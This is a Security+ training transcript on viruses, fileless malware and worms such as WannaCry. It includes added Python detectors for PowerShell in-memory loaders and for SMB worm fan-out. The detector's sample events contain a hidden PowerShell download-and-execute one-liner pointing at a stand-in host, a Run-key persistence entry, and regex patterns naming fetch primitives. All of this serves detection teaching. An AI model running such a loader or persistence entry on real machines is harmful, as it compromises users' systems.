Viruses and Worms – SY0-601 CompTIA Security+ : 1.2

A computer virus can cause significant problems on a system. In this video, you’ll learn about viruses, fileless viruses, and how worms can be used to infect other systems without any human intervention.

A virus is malware that can reproduce itself, but one of the unique characteristics of a virus is that it needs you– the end user– to click on or launch that application to start the virus replication process. This is something that differentiates a virus from a worm. The virus needs a human being to start the process, whereas a worm can jump from machine to machine without any human intervention whatsoever. Once the end user has launched the executable that starts the virus, it can use the existing file system or the network to replicate itself.

What happens next depends on the virus itself. Some viruses are very malicious– can delete files, can encrypt your data, and can cause some serious problems on your computer– whereas other viruses may be relatively benign. They may simply put advertising on your screen, or they may be simply gathering information from your computer, and you may have no idea the virus is even installed. This is one of the main reasons we keep antivirus software running on our computers. It’s able to recognize when a virus is starting, and then it can stop the virus before it begins to execute.

It’s always important to keep our signatures updated so our antivirus software can recognize and stop these viruses from executing. We tend to put viruses into different categories. One of the most common virus types is a program virus, where the virus is part of an application that is running, and you clicking on that application– or launching that application– is what causes the virus to execute on your system.

A relatively rare virus these days is a boot sector virus. This is a virus that exists in the boot sector of your storage device, and when you start your computer, the virus itself is launched. All you have to do is start the operating system, and the virus is started, along with the boot sector. Some viruses operate as scripts on your system. They may operate as a script in the operating system, or they might be a script that runs inside of your browser.

Another type of virus that’s very similar to a script virus is a macro virus. A macro virus is usually running inside of another application. These are commonly associated with Microsoft Office apps. A newer style of virus is a fileless virus. It is a virus that never installs itself or saves itself as a file on your file system. This is a method that the virus uses to try to avoid some of the techniques that the antivirus software uses, especially if the antivirus software is looking at what you save to a storage drive.

If the virus is never saving itself to the storage drive, then it may be able to evade the antivirus software. Instead of existing as a file that might execute, the fileless virus operates solely in the memory of the computer. Once it’s started, all of the operations happen inside of RAM, and nothing is ever written to the storage drive on your system. A common way to execute a fileless virus is to click a link on a website or click a link that’s inside of an email. This will then download software that will run as a Flash file, a Java file, or perhaps it takes advantage of a Windows vulnerability to begin executing.

These vulnerabilities in Flash, or Java, or Windows might allow a script to be run in PowerShell, for example. PowerShell would then download the virus from a third-party website and then execute that virus in the memory of your local computer. Once this virus is executing in the memory of your system, it can encrypt files, it can delete information, it can exfiltrate data, and do anything else that you as an end user may have access to run on that computer. And, since the virus writers would like to have this fileless virus execute again later, they might even change your registry so that this entire process can start itself all over again every time you boot your computer.
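The chain just described (an Office document or browser link, PowerShell pulling a payload straight into memory, and a Run key so it survives a reboot) leaves traces in endpoint telemetry even though nothing is written to disk as a file. The following Python is an added example, not part of the video, that runs three defender-side heuristics over a handful of constructed process-creation and registry events in a simplified Sysmon-like shape; the field names, the host `ws-17`, the 203.0.113.5 address and the rule thresholds are all assumptions made for the example.

```python
"""Flag fileless-style activity in constructed endpoint telemetry.

Heuristics (defender-side, deliberately simple, not exhaustive):
  1. An Office app or browser spawning a script host (macro / script virus stage).
  2. PowerShell whose command line fetches content over the network and hands
     it straight to Invoke-Expression, so nothing is ever saved as a file.
  3. A Run key being written by a script host, so the chain restarts at boot.
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_AND_BROWSERS = {"winword.exe", "excel.exe", "outlook.exe",
                       "chrome.exe", "firefox.exe", "iexplore.exe"}

# Network-fetch primitives that show up in one-line PowerShell loaders
FETCH_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                      r"net\.webclient|start-bitstransfer", re.I)
# Execution of the fetched text in memory
INMEM_RE = re.compile(r"\biex\b|invoke-expression", re.I)
# Classic autostart location used to re-launch the chain at logon
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)

# Constructed events (assumed schema, not a real product's log format)
SAMPLE_EVENTS = [
    {"ts": "2017-05-12T09:01:10Z", "host": "ws-17", "event": "process_create",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.5/stage')"},
    {"ts": "2017-05-12T09:01:12Z", "host": "ws-17", "event": "registry_set",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "data": "powershell.exe -w hidden -c IEX (New-Object Net.WebClient)"
             ".DownloadString('http://203.0.113.5/stage')"},
    # Benign: an admin opening a shell from Explorer to list files
    {"ts": "2017-05-12T09:05:00Z", "host": "ws-17", "event": "process_create",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "powershell.exe -c Get-ChildItem C:\\Users"},
    # Benign: an installer registering its own updater
    {"ts": "2017-05-12T09:06:00Z", "host": "ws-17", "event": "registry_set",
     "image": "C:\\Windows\\System32\\msiexec.exe",
     "key": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\VendorUpdate",
     "data": "C:\\Program Files\\Vendor\\update.exe"},
]


@dataclass
class Alert:
    ts: str
    host: str
    rule: str
    detail: str


def basename(path):
    """Last path component, lower-cased, so image names compare reliably."""
    return path.rsplit("\\", 1)[-1].lower()


def inspect_event(ev):
    """Apply the three heuristics to one event; return zero or more Alerts."""
    alerts = []
    if ev["event"] == "process_create":
        child, parent = basename(ev["image"]), basename(ev["parent"])
        cmd = ev.get("cmdline", "")
        if parent in OFFICE_AND_BROWSERS and child in SCRIPT_HOSTS:
            alerts.append(Alert(ev["ts"], ev["host"],
                                "office_or_browser_spawns_script_host", f"{parent} -> {child}"))
        if child in {"powershell.exe", "pwsh.exe"} and FETCH_RE.search(cmd) and INMEM_RE.search(cmd):
            alerts.append(Alert(ev["ts"], ev["host"],
                                "powershell_download_to_memory", cmd[:80]))
    elif ev["event"] == "registry_set":
        if RUN_KEY_RE.search(ev["key"]) and basename(ev["image"]) in SCRIPT_HOSTS:
            alerts.append(Alert(ev["ts"], ev["host"],
                                "run_key_written_by_script_host", f'{ev["key"]} = {ev["data"][:60]}'))
    return alerts


def scan(events):
    """Run inspect_event over a stream of events and collect every Alert."""
    return [a for ev in events for a in inspect_event(ev)]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert.ts} {alert.host} {alert.rule}: {alert.detail}")
```

The two benign events produce nothing: a shell started from Explorer to list a directory has neither a fetch nor an in-memory execute, and an installer writing its own Run value is not a script host. On a real fleet the parent/child rule fires on some legitimate macros, so it is the combination of rules on one host within a short time, rather than any single match, that is worth paging someone for.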

As we mentioned earlier, a traditional virus requires an end user to click on an executable and start the process, but a type of virus that doesn’t need any type of user intervention is a worm. A worm takes advantage of a vulnerability in operating systems or applications to be able to move itself from system to system without requiring any type of user intervention. Worms take advantage of the connectivity we have on our local networks and our internet-connected systems to be able to move very quickly and very easily from computer to computer.

These worms are so good at propagating themselves that it’s not unusual for hundreds of thousands or even millions of systems to be infected in a very short period of time. Once the worm has been identified, and a signature has been created, we can usually stop the propagation of the worm at the firewall or the IPS. This obviously requires that we know the worm exists and that we can create a signature for it, and it also requires that you’re able to put a firewall or an IPS in place between two systems so that you can block that flow of communication.

A major worm infestation occurred on Friday, May the 12th of 2017. This is the WannaCry worm. This worm not only propagated itself automatically– because it was a worm– but it also was very destructive because it installed crypto malware and began encrypting people’s personal files. This started with a system that was already infected, and it began looking for other vulnerable systems. This worm took advantage of a vulnerability in Microsoft Server Message Block version 1– or SMB v1– and it used an exploit called EternalBlue to be able to find other systems that are on the network and then infect those systems.

Once another vulnerable system was identified by the EternalBlue worm, then it installed a backdoor application called DoublePulsar. DoublePulsar then downloaded the WannaCry ransomware and began encrypting the files on the person’s computer. This process then automatically began again. The worm was able to propagate itself from computer to computer without needing any type of human intervention.
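A signature, as noted above, only helps once the worm is known. What a worm cannot hide is its behaviour on the wire: one host opening connections to the same service (for WannaCry, SMB on TCP/445) on many distinct neighbours in a short time, and a host it reached doing the same shortly afterwards. The Python below is an added example, not from the video, that applies that fan-out heuristic to constructed flow records and then reconstructs which scanner infected which; the addresses, the 60-second window and the threshold of 8 distinct destinations are assumptions chosen for the example, and timestamps are seconds since the start of the capture.

```python
"""Spot worm-style lateral propagation in constructed flow records.

Normal SMB clients talk to a few file servers over and over.  A worm sweeps
many distinct machines on the same port in a short span.  The tell is fan-out:
one source, many distinct destinations, same port, small time window.
"""
from collections import defaultdict, deque


def _burst(src, dst_prefix, first, last, t0, step=1, dport=445):
    """One flow per second from src to dst_prefix.first .. dst_prefix.last."""
    return [(t0 + i * step, src, f"{dst_prefix}.{n}", dport)
            for i, n in enumerate(range(first, last + 1))]


# Flow record: (t_seconds, src, dst, dport).  Constructed for this example.
FLOWS = (
    _burst("10.0.0.5", "10.0.0", 20, 31, t0=0)                        # seed sweeps 12 neighbours
    + [(t, "10.0.0.50", "10.0.0.100", 445) for t in range(0, 60, 2)]  # normal client, one file server
    + _burst("10.0.0.20", "10.0.1", 1, 10, t0=30)                     # a swept host starts sweeping too
    + [(5, "10.0.0.50", "10.0.0.21", 443)]                            # unrelated HTTPS flow
)


def find_scanners(flows, port=445, window=60, threshold=8):
    """Return {src: t_alert} for each source that reached at least `threshold`
    distinct destinations on `port` within some `window`-second span."""
    by_src = defaultdict(list)
    for t, src, dst, dport in sorted(flows):
        if dport == port:
            by_src[src].append((t, dst))
    alerts = {}
    for src, events in by_src.items():
        recent = deque()  # (t, dst) pairs inside the sliding window
        for t, dst in events:
            recent.append((t, dst))
            while recent and recent[0][0] < t - window:
                recent.popleft()
            if len({d for _, d in recent}) >= threshold:
                alerts[src] = t  # first moment the fan-out crossed the line
                break
    return alerts


def propagation_chain(flows, scanners, port=445):
    """For each scanner, name the earliest other scanner that contacted it on
    `port` before it tripped the alert.  The seed host has no parent."""
    parents = {}
    for child, t_child in scanners.items():
        candidates = [(t, src) for t, src, dst, dport in flows
                      if dst == child and dport == port and src in scanners
                      and src != child and t < t_child]
        if candidates:
            parents[child] = min(candidates)[1]
    return parents


if __name__ == "__main__":
    scanners = find_scanners(FLOWS)
    for src, t in sorted(scanners.items(), key=lambda kv: kv[1]):
        print(f"t={t:>3}s  {src} reached >= 8 distinct hosts on 445")
    for child, parent in propagation_chain(FLOWS, scanners).items():
        print(f"{parent} -> {child}: swept, then began sweeping")
```

The seed host trips the alert after its eighth distinct neighbour, the host it reached first trips it thirty seconds later, and the ordinary client that opened thirty sessions to a single file server never does, because distinct destinations, not connection count, is what the rule measures. Feeding these alerts to the firewall or IPS as a block on port 445 from the flagged sources is the behavioural counterpart to the signature-based blocking the transcript describes.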